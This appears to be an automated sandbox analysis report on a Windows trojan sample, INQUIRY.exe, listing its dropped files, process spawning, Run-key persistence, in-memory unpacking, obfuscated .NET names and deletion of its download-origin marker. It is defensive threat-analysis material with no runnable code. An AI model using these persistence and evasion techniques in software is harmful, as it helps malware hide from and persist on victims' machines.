Source: INQUIRY.exe, 00000002.00000002.918484295.0000000002911000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs INQUIRY.exe
Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs INQUIRY.exe
Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs INQUIRY.exe

Source: INQUIRY.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rstmgknbahw.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\INQUIRY.exe

File read: C:\Users\user\Desktop\INQUIRY.exe

Jump to behavior

Source: INQUIRY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INQUIRY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
Source: C:\Users\user\Desktop\INQUIRY.exe	Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
Source: C:\Users\user\Desktop\INQUIRY.exe	Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe

File created: C:\Users\user\AppData\Roaming\sspgadrjncoy

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe

File created: C:\Users\user\AppData\Local\Temp\nsc48D4.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/12@20/1

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,

1_2_00402012

Source: C:\Users\user\Desktop\INQUIRY.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404275

Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\INQUIRY.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{b46b5964-4830-4c6b-9df5-a21557a1e56d}
Source: C:\Users\user\Desktop\INQUIRY.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Code function: 4_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

4_2_00401489

Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\INQUIRY.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdb] source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbX source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918001760.0000000000807000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: rlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\INQUIRY.exe	Unpacked PE file: 2.2.INQUIRY.exe.2520000.4.unpack
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Unpacked PE file: 6.2.rstmgknbahw.exe.4980000.9.unpack

.NET source code contains potential unpacker

Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812145 push eax; iretd	2_3_00812183
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_008166AD push edi; iretd	2_3_00816D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00812001 pushad ; iretd	2_3_00812003
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 2_3_00813A15 pushfd ; iretd	2_3_00813BDB

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405DA3

Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.2.INQUIRY.exe.2520000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\INQUIRY.exe	File created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	File created: C:\Users\user\AppData\Local\Temp\nsz814B.tmp\gerys.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INQUIRY.exe	File created: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	File created: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll	Jump to dropped file

Source: C:\Users\user\Desktop\INQUIRY.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run earyw			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run earyw			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\INQUIRY.exe

File opened: C:\Users\user\Desktop\INQUIRY.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
